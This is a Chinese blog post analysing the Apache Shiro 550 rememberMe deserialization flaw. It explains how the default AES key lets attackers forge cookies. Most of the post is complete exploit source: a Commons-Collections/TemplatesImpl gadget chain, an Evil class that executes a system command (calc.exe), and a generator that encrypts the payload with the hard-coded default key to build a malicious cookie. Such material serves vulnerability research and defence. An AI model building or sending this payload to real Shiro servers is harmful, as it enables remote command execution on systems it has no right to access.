Shiro550漏洞分析

最新推荐文章于 2024-05-16 23:23:17 发布
最新推荐文章于 2024-05-16 23:23:17 发布
阅读量273 收藏
点赞数
分类专栏: 代码审计 java安全 文章标签: 安全 服务器 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53264525/article/details/121721765
版权

Shiro550漏洞分析

环境

JDK8

shiro1.2.4

commons-collections-3.2.1

漏洞原理

Shiro安全框架登录时提供记住我功能,当登录时开启记住我功能时返回包会携带一个Cookie字段,键为rememberMe,下次登陆的时候携带返回包的Cookie进行,服务器端会把这个Cookie进行解码后反序列化。

客户端用rememberMe功能时,服务器端会把Cookie数据进行序列化,然后进行AES加密,再Base64编码,最后以rememberMe为键返回给客户端。

当客户端再次登录的时候,会在请求包携带上次返回包返回的Cookie数据,服务器端把请求包携带的Cookie数据进行Base64解码,再AES解密,再进行反序列化。

在Shiro 1.2.4版本之前,进行AES加解密的key有默认值,如果服务器端没更改默认值,则导致攻击者可以构造恶意的序列化数据,并把序列化的数据进行AES加密和Base64编码,最后放到请求包中的rememberMe Cookie字段,传输到服务器端。传送到服务器端后经过Base64、AES解密后获得原始的序列化数据,再反序列化触发反序列化链。

可以说是因为泄露了AES加密的key导致的反序列化漏洞

那么构造payload的流程就为

获得默认key->构造恶意反序列化链->进行AES加密->Base64编码->放到请求包的rememberMe Cookie字段发送->经过服务器端解密、解码后反序列化->触发反序列化链

构造payload

Shiro只是提供了一个反序列化的入口,具体能不能利用还得看服务器端有没有可以利用的反序列化链!

此处加入commons-collections-3.2.1进行反序列化链的构造

构造payload的流程就很简单了,因为加入了commons-collections-3.2.1,那么直接用前面学过的ACC链进行AES加密再Base64编码即可发送Cookie到服务器端触发反序列化,但是Shiro提供的反序列化有一个 "缺陷"

在shiro提供的反序列化中,如果反序列化流中包含非java自身的数组,则会出现无法加载类的错误,那么ACC链中的Transformer数组就不能使用了,那么还怎么构造呢?

我们构造恶意TemplatesImpl对象,调用TemplatesImpl对象的newTransformer方法就可以执行系统命令(此处不理解的可以先去把ACC的几条链跟一跟),但是在ACC链中触发是通过Transformer数组触发的,如下

final Transformer[] transformers = new Transformer[] {
    new ConstantTransformer(TemplatesImpl),
    new InvokerTransformer("newTransformer", null, null)
};

但是shiro提供的反序列化中不允许反序列化流中包含非java自身的数组,上面的构造就用不了了,注意TiedMapEntry类的getValue方法,在调用this.map.get方法时,传入了一个this.key参数,跟一下TiedMapEntry.getValue->LazyMap.get->InvokerTransformer.transformer方法调用链就知道,this.key可以代替ConstantTransformer类作为一个对象传递者的功能,那么此时Transformer数组就一个元素了,那么就消去数组也可以了

最终构造反序列化链如下

public static Object getObject() throws Exception{
    ClassPool pool = ClassPool.getDefault();
    CtClass clazz = pool.get(org.apache.shiro.test.Evil.class.getName());
    byte[] bytes = clazz.toBytecode();
    TemplatesImpl Evilobj = new TemplatesImpl();
    Transformer transformer = new InvokerTransformer("getClass",null,null);
    HashMap inner = new HashMap();
    Map outer = LazyMap.decorate(inner, transformer);
    TiedMapEntry tiedMapEntry = new TiedMapEntry(outer,Evilobj);
    HashMap hashMap = new HashMap();
    hashMap.put(tiedMapEntry, "haha");
    Field iTransformers = transformer.getClass().getDeclaredField("iMethodName");
    iTransformers.setAccessible(true);
    iTransformers.set(transformer,"newTransformer");
    Field bytecodes = Evilobj.getClass().getDeclaredField("_bytecodes");
    bytecodes.setAccessible(true);
    Field name = Evilobj.getClass().getDeclaredField("_name");
    name.setAccessible(true);
    Field tfactory = Evilobj.getClass().getDeclaredField("_tfactory");
    tfactory.setAccessible(true);
    bytecodes.set(Evilobj,new byte[][]{bytes});
    name.set(Evilobj,"ky");
    tfactory.set(Evilobj,new TransformerFactoryImpl());
    inner.clear();
    return hashMap;
}

把序列化的数据进行AES加密后Base64编码,通过Shiro内置的AesCipherService类进行加密并编码,默认的AES加密key为kPH+bIxk5D2deZiIxcaaaA==

public static void main(String[] args) throws Exception{
    HashMap hashMap = (HashMap) getObject();
    ByteArrayOutputStream bo = new ByteArrayOutputStream();
    ObjectOutputStream oo = new ObjectOutputStream(bo);
    oo.writeObject(hashMap);
    byte[] bytes = bo.toByteArray();
    AesCipherService aesCipherService = new AesCipherService();
    byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
    ByteSource encrypt = aesCipherService.encrypt(bytes, key);
    System.out.println(encrypt.toString());
}

构造反序列化链时获取到org.apache.shiro.test.Evil.class恶意类构造方法存在命令执行代码。完整payload

Evil.java文件

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public Evil() throws IOException {
        Runtime.getRuntime().exec("calc.exe");
    }
}

PayloadDemo02.java文件

package org.apache.shiro.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javassist.ClassPool;
import javassist.CtClass;

public class PayloadDemo02 {
    public static void main(String[] args) throws Exception{
        HashMap hashMap = (HashMap) getObject();
        ByteArrayOutputStream bo = new ByteArrayOutputStream();
        ObjectOutputStream oo = new ObjectOutputStream(bo);
        oo.writeObject(hashMap);
        byte[] bytes = bo.toByteArray();
        AesCipherService aesCipherService = new AesCipherService();
        byte[] key = Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
        ByteSource encrypt = aesCipherService.encrypt(bytes, key);
        System.out.println(encrypt.toString());
    }

    public static Object getObject() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(org.apache.shiro.test.Evil.class.getName());
        byte[] bytes = clazz.toBytecode();
        TemplatesImpl Evilobj = new TemplatesImpl();
        Transformer transformer = new InvokerTransformer("getClass",null,null);
        HashMap inner = new HashMap();
        Map outer = LazyMap.decorate(inner, transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outer,Evilobj);
        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "haha");
        Field iTransformers = transformer.getClass().getDeclaredField("iMethodName");
        iTransformers.setAccessible(true);
        iTransformers.set(transformer,"newTransformer");
        Field bytecodes = Evilobj.getClass().getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        Field name = Evilobj.getClass().getDeclaredField("_name");
        name.setAccessible(true);
        Field tfactory = Evilobj.getClass().getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        bytecodes.set(Evilobj,new byte[][]{bytes});
        name.set(Evilobj,"ky");
        tfactory.set(Evilobj,new TransformerFactoryImpl());
        inner.clear();
        return hashMap;
    }
}

把生成的Cookie放到请求包即可进行命令执行

总结

加解密过程代码调试可以参考这篇文章

0x6b79
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro权限绕过漏洞分析(cve-2020-1957) _ Spoock1
08-03
然而,如标题和描述中提到的,存在一个名为CVE-2020-1957的安全漏洞,允许攻击者绕过Shiro的权限检查,从而访问受保护的资源。 该漏洞主要发生在Shiro 1.5.1及更早版本中,当用户请求的URL(URL1)通过Shiro的权限...
shiro认证绕过漏洞分析(CVE-2020-13933)1
08-03
在讨论Shiro的认证绕过漏洞CVE-2020-13933之前,我们首先需要了解Shiro的基本工作原理Shiro的认证过程通常包括以下几个步骤: 1. 用户提交凭证(如用户名和密码)。 2. Shiro的 Realm 对象验证这些凭证, Realm ...
shiro550反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
【网络安全---漏洞复现】shiro550反序列化漏洞原理漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 3947
shiro550反序列化漏洞原理漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiro漏洞浅探
最新发布
2301_82000839的博客
05-16 1001
CVE-2020-11989 的修复补丁存在缺陷,在 1.5.3 及其之前的版本,由于 shiro 在处理 url 时与 spring 仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的 HTTP 请求,绕过身份验证过程并获得对应用程序的未授权访问。该漏洞产生的原因主要是shiro层在处理url上和spring上存在差异,主要是在处理;上的问题,通过构造含有;符号的url即可绕过shiro在权限上的处理,而spring不负责权限管控,所以最终会导致权限绕过。ant。
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6386
shiro反序列化漏洞
Apache shiro 漏洞总结
星落的博客
08-01 4551
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
Shiro 550、721
nana1253431195的博客
08-31 1304
Apache Shiro 是一个功能强大且易于使用的 Java 安全框架,它用于处理身份验证,授权,加密和会话管理在默认情况下 , Apache Shiro 使用 CookieRememberMeManager 对用户身份进行序列化/反序列化 , 加密/解密和编码/解码 , 以供以后检索 .因此 , 当 Apache Shiro 接收到未经身份验证的用户请求时 , 会执行以下操作来寻找他们被记住的身份....
shiro550反序列学习.doc
07-08
### 漏洞分析 3.1.1 **生成恶意 Cookie** - `CookieRememberMeManager` 类负责处理 rememberme 功能的 Cookie,它继承自 `AbstractRememberMeManager`。 - 当用户成功登录并选择“记住我”,`onSuccessfulLogin` ...
Shiro反序列化漏洞详细分析 .pdf
09-05
本文主要探讨了Shiro中的一个严重安全漏洞,即shiro-550反序列化漏洞,以及与其相关的shiro-721 Padding Oracle Attack。这个漏洞可能导致攻击者执行任意代码,对企业的业务风控和信息安全构成威胁。 **shiro-550...
Shiro反序列化流量分析.pdf
05-10
利用工具如shiro_attack-2.2会构造请求包,尝试利用已知的Shiro漏洞执行命令。成功的命令执行通常会有特定的响应标志,如固定的Base64编码字符串或特定的响应包结构。安全厂商的日志分析设备可以捕获这些流量特征,...
Shiro框架漏洞分析与复现
未完成的歌~的博客
05-15 3953
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
【渗透测试】Apache Shiro系列漏洞
weixin_53972936的博客
11-01 3543
Apache Shiro框架是一个功能强大且易于使用的 Java 安全框架,它执行身份验证、授权、加密和会话管理。借助 Shiro 易于理解的 API,您可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
ShiroJava原生反序列化漏洞
热门推荐
公众号shadow sock7
07-28 1万+
参考: http://www.lmxspace.com/2019/10/17/Shiro-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%AE%B0%E5%BD%95/ https://github.com/jas502n/Shiro_Xray 环境搭建 git clone https://github.com/apache/shiro.git # wget https://codeload.github.com/apache/shiro/zip/shiro-root-1
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
人若无名,便可专心练剑
03-14 1148
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
Shiro反序列化漏洞(CVE-2016-4437)+docker靶场+工具利用
weixin_46411728的博客
07-16 2125
shiro_attack_2.2
shiro反序列化漏洞
qq_41696518的博客
06-27 1459
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。在攻击机:192.168.43.131 中生成rememberMe。
shiro-550反序列化漏洞原理分析详解
CleanMe的博客
01-25 1310
shiro-550反序列化漏洞原理分析详解
shiro-550 漏洞原理分析
06-06
Shiro-550漏洞是Apache Shiro框架的一种远程代码执行漏洞。Apache Shiro是一个开源的安全框架,用于认证、授权和加密等安全操作。该漏洞原理是由于Shiro框架在反序列化时存在漏洞,攻击者可以通过构造恶意的序列化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值